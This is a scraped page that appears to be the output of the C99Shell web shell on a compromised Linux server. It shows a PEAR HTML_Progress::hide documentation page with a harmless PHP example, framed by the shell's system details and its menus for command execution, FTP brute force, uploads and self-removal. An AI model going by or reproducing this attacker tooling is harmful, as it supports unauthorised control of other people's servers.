!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/doc/HTML_Progress/docs/TDG/HTML_Progress/   drwxr-xr-x
Free 13.06 GB of 61.93 GB (21.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tutorial_progress.hide.pkg.html (6.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
HTML_Progress::hide
HTML_Progress
[ class tree: HTML_Progress ] [ index: HTML_Progress ] [ all elements ]
Prev Next
HTML_Progress::hide
hides the progress meter at end of process

Synopsis

require_once 'HTML/Progress.php';

void HTML_Progress::hide()

Description

This method is used to hide the progress meter at end of process, when the progress meter reachs 100%.

Note

( HTML_Progress >= 1.2.0RC3 )

This function can not be called statically.

See

HTML_Progress::run, HTML_Progress::display, HTML_Progress::toHtml

Example

Example below (that requires HTML_Progress >= 1.2.0RC3) will produced a progress bar which becomes hidden at end of process.

  1. <?php
  2. require_once 'HTML/Progress.php';
  3.  
  4. $progress = new HTML_Progress();
  5. $progress->setAnimSpeed(250);
  6. $progress->setIncrement(10);
  7. ?>
  8. <html>
  9. <head>
  10. <style type="text/css">
  11. <!--
  12. body {
  13. background-color: #CCCC99;
  14. color: #996;
  15. font-family: Verdana, Arial;
  16. }
  17.  
  18. <?php echo $progress->getStyle(); ?>
  19. // -->
  20. </style>
  21. <script type="text/javascript">
  22. <!--
  23. <?php echo $progress->getScript(); ?>
  24. //-->
  25. </script>
  26. </head>
  27. <body>
  28.  
  29. <?php
  30. echo $progress->toHtml();
  31. $progress->run();
  32. $progress->hide();
  33. ?>
  34.  
  35. <h1>Your job is finished ! </h1>
  36. <p>The progress meter is now hidden.</p>
  37.  
  38. </body>
  39. </html>

Prev Up Next
HTML_Progress::display Reference Guide HTML_Progress::toHtml

Documentation generated on Sun, 12 Sep 2004 20:23:00 +0200 by phpDocumentor 1.3.0RC3

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5408 ]--